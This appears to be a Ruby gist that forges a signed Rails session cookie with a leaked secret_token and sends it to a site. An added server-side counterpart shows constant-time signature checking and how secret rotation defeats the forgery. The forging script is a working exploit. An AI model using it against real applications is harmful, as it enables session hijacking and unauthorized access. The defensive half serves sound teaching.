@robert
Created July 22, 2013 08:22
require "net/http"
require "uri"
require "base64"   # needed for Base64.encode64 below
require "cgi"      # needed for CGI.escape below
require "openssl"  # needed for OpenSSL::HMAC / OpenSSL::Digest below
secret_token = "stolen-from-github-or-somewhere"
# Construct your evil hash
my_evil_session_hash = {
"ive_made_a_huge_mistake" => true
}
# Serialize your hash (the Rails cookie store Marshal-dumps the session hash)
marshal_dump = Marshal.dump(my_evil_session_hash)
# Base64 encode this dump
unescaped_cookie_value = Base64.encode64(marshal_dump)
# Escape any troublesome characters and remove line breaks altogether
escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "")
# Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs.
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "="))
# Construct your evil cookie by concatenating the value with the signature (the "data--hexdigest" layout the cookie store expects)
my_evil_cookie = "_MyApp_session=#{unescaped_cookie_value}--#{cookie_signature}"
# BOMBS AWAY
url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path
req = Net::HTTP::Get.new(url.path)
req.add_field("Cookie", my_evil_cookie)
res = Net::HTTP.new(url.host, url.port).start do |http|
http.request(req)
end
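The server-side counterpart to the script above, added here as an example and not taken from the gist: how a Rails-style cookie store checks the `data--hexdigest` signature in constant time before it deserializes anything, and why a cookie signed with a leaked `secret_token` stops validating the moment the secret is rotated. The secret strings and the `user_id` session are constructed values.

```ruby
require "base64"
require "openssl"

# Constant-time string comparison (the approach Rack uses), so that an early
# exit on the first differing byte does not leak how much of a digest matched.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack("C*")
  diff = 0
  b.each_byte { |byte| diff |= byte ^ left.shift }
  diff.zero?
end

# Server side: serialize, Base64-encode and sign a session hash as
# "data--hexdigest" (strict Base64, so no line breaks end up in the cookie).
def issue_session_cookie(session, secret)
  data = Base64.strict_encode64(Marshal.dump(session))
  "#{data}--#{OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)}"
end

# Server side: verify the digest BEFORE touching the payload. Returns the
# session hash, or nil for a missing, malformed or mismatching signature.
# Marshal.load only ever runs on data whose HMAC checked out, so a cookie
# signed with a leaked secret is rejected as soon as the secret is rotated.
def verify_session_cookie(cookie_value, secret)
  data, digest = cookie_value.to_s.split("--", 2)
  return nil if data.nil? || digest.nil? || data.empty?
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
  return nil unless secure_compare(expected, digest)
  Marshal.load(Base64.decode64(data))
end

if __FILE__ == $0
  leaked  = "stolen-from-github-or-somewhere" # the secret named in the gist
  rotated = "rotated-secret-placeholder"      # constructed replacement value
  cookie  = issue_session_cookie({ "user_id" => 42 }, leaked)
  p verify_session_cookie(cookie, leaked)   # => {"user_id"=>42}
  p verify_session_cookie(cookie, rotated)  # => nil
end
```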